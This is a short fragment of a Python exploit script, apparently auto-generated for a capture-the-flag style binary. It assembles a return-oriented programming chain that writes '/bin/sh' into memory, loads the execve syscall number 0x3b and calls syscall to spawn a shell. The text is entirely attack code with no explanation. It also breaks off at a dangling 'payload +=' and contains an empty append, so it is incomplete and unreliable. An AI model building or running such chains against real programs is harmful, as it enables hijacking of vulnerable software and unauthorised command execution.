payload = p64(0x403b26)
#0x0000000000403b26: pop rdx; ret; 
payload += p64(0x416010)+p64(0x40322c)
# 0x000000000040322c: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x40c912)
# 0x000000000040c912: mov qword ptr [rdx + 0x60], rax; xor eax, eax; ret; 
payload += p64(0x40e1fb)
# 0x000000000040e1fb: and al, 0x68; mov rdi, qword ptr [rsp + 0x18]; mov rax, qword ptr [rsp + 0x10]; call rax; 
payload += b''
# 0x0000000000403bec: pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x4044c1)
# 0x00000000004044c1: mov eax, edx; add rsp, 0x18; ret; 
payload += p64(0x403bec)+p64(0x416070)+p64(0x0)+p64(0x405505)
# 0x0000000000405505: pop rsi; ret; 
payload += p64(0x0)+p64(0x403b26)
# 0x0000000000403b26: pop rdx; ret; 
payload += p64(0x0)+p64(0x40322c)
# 0x000000000040322c: pop rax; ret; 
payload += p64(0x3b)+p64(0x40f70e)
# 0x000000000040f70e: syscall; 
payload +=
